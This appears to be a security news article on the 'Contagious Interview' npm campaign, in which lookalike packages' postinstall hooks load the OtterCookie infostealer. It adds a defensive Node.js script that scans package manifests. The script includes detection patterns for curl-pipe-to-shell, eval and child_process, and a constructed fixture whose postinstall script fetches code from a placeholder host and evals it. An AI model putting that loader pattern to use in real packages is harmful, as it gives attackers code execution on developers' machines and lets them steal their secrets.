
The operation, tracked as “Contagious Interview” by Socket’s Threat Research Team, continues to exploit supply-chain trust to deliver malware disguised as open-source tools.
Malicious NPM Packages and Delivery Chain
Researchers found that the new wave of malicious npm packages, including “tailwind-magic”, “node-tailwind”, and “react-modal-select”, was uploaded by accounts linked to the North Korean threat actor group operating through a GitHub profile named stardev0914.
These packages mimic legitimate libraries such as “tailwind-merge” but carry hidden installation scripts. When a developer installs one of them, npm runs the package’s postinstall hook, which connects to a Vercel-hosted server (tetrismic[.]vercel[.]app).
The server returns JavaScript that the hook executes directly on the victim’s machine, giving the attacker code execution with the developer’s privileges.
The packages serve as loaders that fetch a second-stage payload known as OtterCookie, a hybrid infostealer and remote access trojan (RAT).
The malware communicates with a command-and-control (C2) server at 144[.]172[.]104[.]117, allowing attackers to issue commands, extract data, and maintain access silently.
OtterCookie Malware Capabilities
Once deployed, the OtterCookie variant fingerprints the victim’s system, performs sandbox checks to avoid analysis, and establishes persistent C2 communication.
It enables attackers to open a remote shell, steal clipboard data, capture screenshots, log keystrokes, and recursively search the file system for secrets, wallet seed phrases, and credentials.
The malware also targets Chrome and Brave browser profiles to extract saved passwords and data from popular cryptocurrency wallet extensions such as MetaMask, Phantom, and Trust Wallet.
The malware runs on Windows, macOS, and Linux, so each infected machine becomes a channel for continuous data theft regardless of platform.

Socket’s analysis revealed that the GitHub repositories associated with stardev0914 were polished and designed to appear to be legitimate crypto projects.
Some cloned existing projects such as Knightsbridge DEX, using them as bait to lure Web3 developers through fake job interviews and coding tests.
Although GitHub has since removed the malicious repositories, at least 15 packages remained live on npm at the time of the report. Researchers warned that new variants are appearing weekly.
Security experts recommend that developers treat every npm installation as potential remote code execution, pin dependency versions exactly rather than using ranges, and review imported packages manually. Installing with `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) stops lifecycle hooks such as postinstall from running at all, which blocks this loader stage outright.
Organizations are urged to monitor build processes, apply egress restrictions so build hosts cannot reach arbitrary servers, and adopt automated scanning tools that identify behaviors such as eval calls, install-time loader scripts, and C2 communications.
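The loader pattern described in the delivery-chain section (a postinstall hook that fetches code from a remote host and evaluates it) is what the scanning tools recommended above look for. As an added example, not code from the Socket report or from the packages it describes, the Node.js script below audits a package manifest for that pattern and for unpinned dependency ranges. The package names, script bodies and the `stage.example.invalid` loader URL are constructed for the demo and are not indicators from the report.

```javascript
// Added example (not from the Socket report): a small static auditor for npm
// lifecycle scripts. It flags install hooks that combine network access with
// dynamic execution or shell access, and dependency specs that are not pinned
// to an exact version. All sample data below is constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators that matter most when they appear together in one install hook.
const INDICATORS = {
  network: /https?\.(get|request)\(|\bfetch\(|\brequire\(["'](axios|node-fetch)["']\)|\bnet\.connect\(/,
  dynamicExec: /\beval\(|new Function\(|\bvm\.runIn\w*Context\(/,
  shell: /\brequire\(["']child_process["']\)|\bexecSync\(|\bspawnSync\(/,
  encodedPayload: /Buffer\.from\(["'][A-Za-z0-9+\/=]{32,}["'],\s*["']base64["']\)|String\.fromCharCode\(/,
  pipeToShell: /\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b/,
};
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

// Resolve a "node <file>.js" hook to the script body when the file is available.
function scriptBody(command, files) {
  const m = command.match(/\bnode\s+(?:--\S+\s+)*(\S+\.js)\b/);
  if (m && files[m[1]] !== undefined) return files[m[1]];
  return "";
}

// Inspect one lifecycle hook: the command line plus the script it runs.
function auditHook(hook, command, files) {
  const text = command + "\n" + scriptBody(command, files);
  const indicators = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(text));
  const urls = text.match(URL_RE) || [];
  return { hook, command, indicators, urls };
}

// "high" = fetch-and-execute loader shape or a curl|sh one-liner;
// "medium" = a single suspicious indicator; "low" = hooks with nothing flagged.
function rateHooks(findings) {
  const hit = (f, k) => f.indicators.includes(k);
  const loader = (f) =>
    hit(f, "pipeToShell") ||
    (hit(f, "network") && (hit(f, "dynamicExec") || hit(f, "shell") || hit(f, "encodedPayload")));
  if (findings.some(loader)) return "high";
  if (findings.some((f) => f.indicators.length > 0)) return "medium";
  return findings.length > 0 ? "low" : "none";
}

// Exact versions only; ranges such as ^2.0.0 let a later malicious release
// be pulled in on the next install.
function isPinned(spec) {
  return /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/.test(spec);
}

function auditPackage(manifest, files = {}) {
  const scripts = manifest.scripts || {};
  const findings = LIFECYCLE_HOOKS
    .filter((h) => typeof scripts[h] === "string")
    .map((h) => auditHook(h, scripts[h], files));
  const deps = { ...(manifest.dependencies || {}), ...(manifest.devDependencies || {}) };
  const unpinned = Object.entries(deps).filter(([, spec]) => !isPinned(spec)).map(([n]) => n);
  return { name: manifest.name, risk: rateHooks(findings), findings, unpinned };
}

// Constructed lookalike package: a postinstall hook that pulls a second stage
// from a placeholder host and evals it (hypothetical name and URL).
const SUSPECT_MANIFEST = {
  name: "tailwind-magick-demo",
  version: "1.0.3",
  scripts: { postinstall: "node setup.js" },
  dependencies: { "tailwind-merge": "^2.0.0" },
};
const SUSPECT_FILES = {
  "setup.js": `
const https = require("https");
https.get("https://stage.example.invalid/v1", (res) => {
  let body = "";
  res.on("data", (c) => (body += c));
  res.on("end", () => eval(body));
});`,
};

// Constructed benign package: a build hook with no network or dynamic execution.
const BENIGN_MANIFEST = {
  name: "internal-ui-kit",
  version: "3.1.0",
  scripts: { prepare: "node scripts/build.js", test: "node --test" },
  dependencies: { react: "18.2.0" },
};
const BENIGN_FILES = { "scripts/build.js": `console.log("building css");` };

for (const [m, f] of [[SUSPECT_MANIFEST, SUSPECT_FILES], [BENIGN_MANIFEST, BENIGN_FILES]]) {
  console.log(JSON.stringify(auditPackage(m, f), null, 2));
}
```

Run over a real checkout by reading each `node_modules/*/package.json` and the files its hooks reference; a "high" result on a package that has no reason to touch the network at install time is the signal to stop and read the script before it ever runs. The auditor is a triage aid, not a substitute for `--ignore-scripts`: a hook can hide its fetch behind obfuscation the regexes do not cover.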
The post North Korean Hackers Deploy 197 Malicious NPM Packages to Attack Web3 Developers appeared first on Cyber Security News.
